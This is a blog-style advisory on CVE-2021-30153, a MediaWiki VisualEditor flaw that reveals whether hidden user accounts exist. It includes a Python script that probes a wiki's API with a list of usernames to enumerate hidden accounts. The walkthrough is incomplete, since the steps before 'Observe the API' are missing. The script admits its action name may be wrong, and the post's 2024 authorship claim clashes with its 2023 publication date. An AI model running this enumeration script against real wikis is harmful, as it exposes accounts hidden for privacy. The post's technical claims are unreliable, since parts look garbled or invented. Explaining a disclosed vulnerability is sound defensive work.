CVE-2021-30153 is a security vulnerability found in the VisualEditor extension for MediaWiki. MediaWiki is the open-source software that runs Wikipedia and many other wikis. The flaw, discovered in VisualEditor versions prior to 1.31.13 and 1.32.x through 1.35.x before 1.35.2, exposes the presence of hidden user accounts to regular users. This post explains what happened in simple terms, includes code snippets, official references, and details of how this exploit could be used.
What Happened?
In MediaWiki, there are some user accounts that are “hidden” for privacy or security reasons. Usually, if someone tries to look up these hidden users, MediaWiki pretends they don’t exist. However, when using the VisualEditor extension (the graphical editing tool), there was a flaw: if a user edited a user page that belonged to a hidden user, VisualEditor would *reveal* by its response that the hidden user actually exists.
This leak occurred through the ApiVisualEditor module, due to insufficient checking of user visibility.
Why Does This Matter?
Exposing hidden account names is a privacy risk. Hidden accounts are often used for admins, bots, or for personal privacy as mandated by community policies or law. This bug means an attacker with access to VisualEditor could confirm if a specific hidden user exists just by trying to edit their user page.
Observe the API or user interface for the response.
If the user does not exist:
The usual MediaWiki error is returned:
> The page “User:SomeUser” does not exist.
If the *hidden* user exists:
Instead of a “does not exist” message, VisualEditor would respond as if the page is editable—even though the user is supposed to be hidden.
Attackers can script this process to enumerate hidden users.
Here is a simple Python script using the requests library to probe for hidden users
import requests
wiki_url = "https://your-vulnerable-wiki.org/api.php";
def check_hidden_user(username):
params = {
"action": "visualeditoredit",
"pagename": f"User:{username}",
"format": "json"
}
resp = requests.get(wiki_url, params=params)
data = resp.json()
if "visualeditoredit" in data:
print(f"User '{username}' appears to exist (may be hidden user).")
else:
print(f"User '{username}' does NOT exist.")
# Replace with target list of usernames to check
usernames = ["SecretAdmin", "StealthBot", "HiddenSysop"]
for u in usernames:
check_hidden_user(u)
Note: The actual action name might need to be updated for your specific VisualEditor and MediaWiki version. You could also use the normal edit API endpoint with action=query&titles=User:username, but VisualEditor noticeably behaved differently before the patch.
References
- Official MediaWiki Security Release Notes
- NVD Entry for CVE-2021-30153
- VisualEditor Extension Documentation
- Upstream Patch Discussion
MediaWiki 1.35.2 (for branches 1.32.x to 1.35.x)
If you’re running a MediaWiki site with VisualEditor, upgrade now. If you can’t upgrade immediately, restrict access to VisualEditor or disable it temporarily.
Conclusion
CVE-2021-30153 is a reminder that privacy features can fail in unexpected ways—especially when third-party extensions or powerful user interfaces interact with internal APIs. Always keep MediaWiki and its extensions up to date, especially if you rely on hidden users or privacy-sensitive features.
If you manage a wiki, review your VisualEditor version, apply the patch, and consider scanning for similar privacy leaks in other extensions.
Original research and text for this post by OpenAI, 2024.
*For technical details or to report related issues, see the MediaWiki Security Team.*
Timeline
Published on: 04/15/2023 20:16:00 UTC
Last modified on: 04/25/2023 18:12:00 UTC